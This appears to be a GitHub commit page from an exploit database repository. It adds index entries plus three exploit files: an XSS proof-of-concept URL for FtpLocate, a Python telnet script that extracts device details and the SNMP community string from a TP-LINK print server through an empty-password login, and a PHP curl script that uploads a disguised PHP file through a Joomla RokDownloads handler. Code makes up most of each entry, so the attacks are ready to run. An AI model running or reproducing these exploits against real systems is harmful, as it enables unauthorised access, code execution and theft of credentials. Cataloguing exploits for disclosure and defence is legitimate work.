Skip to content

Commit c559949

Browse files
author
Offensive Security
committed
DB: 2015-11-02
3 new exploits
1 parent 6123605 commit c559949

4 files changed

Lines changed: 72 additions & 0 deletions

File tree

files.csv

Lines changed: 3 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -34864,3 +34864,6 @@ id,file,description,date,author,platform,type,port
3486434864
38588,platforms/php/webapps/38588.php,"bloofoxCMS 'index.php' Arbitrary File Upload Vulnerability",2013-06-17,"CWH Underground",php,webapps,0
3486534865
38589,platforms/linux/dos/38589.c,"Linux Kernel <= 3.0.5 'test_root()' Function Local Denial of Service Vulnerability",2013-06-05,"Jonathan Salwan",linux,dos,0
3486634866
38590,platforms/php/webapps/38590.txt,"et-chat Privilege Escalation and Arbitrary Shell Upload Vulnerabilities",2013-06-18,MR.XpR,php,webapps,0
34867+
38591,platforms/hardware/remote/38591.py,"TP-LINK TL-PS110U Print Server 'tplink-enum.py' Security Bypass Vulnerability",2013-06-19,SANTHO,hardware,remote,0
34868+
38592,platforms/php/webapps/38592.php,"Joomla! RokDownloads Component Arbitrary File Upload Vulnerability",2013-06-19,Am!r,php,webapps,0
34869+
38593,platforms/cgi/webapps/38593.txt,"FtpLocate HTML Injection Vulnerability",2013-06-24,Chako,cgi,webapps,0

platforms/cgi/webapps/38593.txt

Lines changed: 9 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,9 @@
1+
source: http://www.securityfocus.com/bid/60760/info
2+
3+
FtpLocate is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input.
4+
5+
Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
6+
7+
FtpLocate 2.02 is vulnerable; other versions may also be affected.
8+
9+
http://www.example.com/cgi-bin/ftplocate/flsearch.pl?query=FTP&fsite=<script>alert('xss')</script>

platforms/hardware/remote/38591.py

Lines changed: 39 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,39 @@
1+
source: http://www.securityfocus.com/bid/60682/info
2+
3+
TP-LINK TL-PS110U Print Server is prone to a security-bypass vulnerability.
4+
5+
Attackers can exploit this issue to bypass certain security restrictions and obtain sensitive information which may aid in further attacks.
6+
http://drupal.org/node/207891
7+
8+
import telnetlib
9+
import sys
10+
host = sys.argv[1]
11+
tn = telnetlib.Telnet(host)
12+
tn.read_until("Password:")
13+
tn.write("\r\n")
14+
tn.read_until("choice")
15+
tn.write("1\r\n")
16+
tn.read_until("choice")
17+
tn.write("1\r\n")
18+
data = tn.read_until("choice")
19+
for i in data.split("\r\n"):
20+
if "Device Name" in i:
21+
print i.strip()
22+
if "Node ID" in i:
23+
print i.strip()
24+
tn.write("0\r\n")
25+
tn.read_until("choice")
26+
tn.write("2\r\n")
27+
data = tn.read_until("choice")
28+
for i in data.split("\r\n"):
29+
if "Manufacture:" in i:
30+
print i.strip()
31+
if "Model:" in i:
32+
print i.strip()
33+
tn.write("0\r\n")
34+
tn.read_until("choice")
35+
tn.write("5\r\n")
36+
data = tn.read_until("choice")
37+
for i in data.split("\r\n"):
38+
if "Community" in i:
39+
print i.strip()

platforms/php/webapps/38592.php

Lines changed: 21 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,21 @@
1+
source: http://www.securityfocus.com/bid/60690/info
2+
3+
The RokDownloads component for Joomla! is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.
4+
5+
An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application.
6+
7+
<?php
8+
9+
$uploadfile="Amir.php.gif";
10+
11+
$ch =
12+
curl_init("http://www.exemple.com/administrator/components/com_rokdownloads/assets/uploadhandler.php");
13+
curl_setopt($ch, CURLOPT_POST, true);
14+
curl_setopt($ch, CURLOPT_POSTFIELDS,
15+
array('Filedata'=>"@$uploadfile"));
16+
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
17+
$postResult = curl_exec($ch);
18+
curl_close($ch);
19+
print "$postResult";
20+
21+
?>

0 commit comments

Comments
 (0)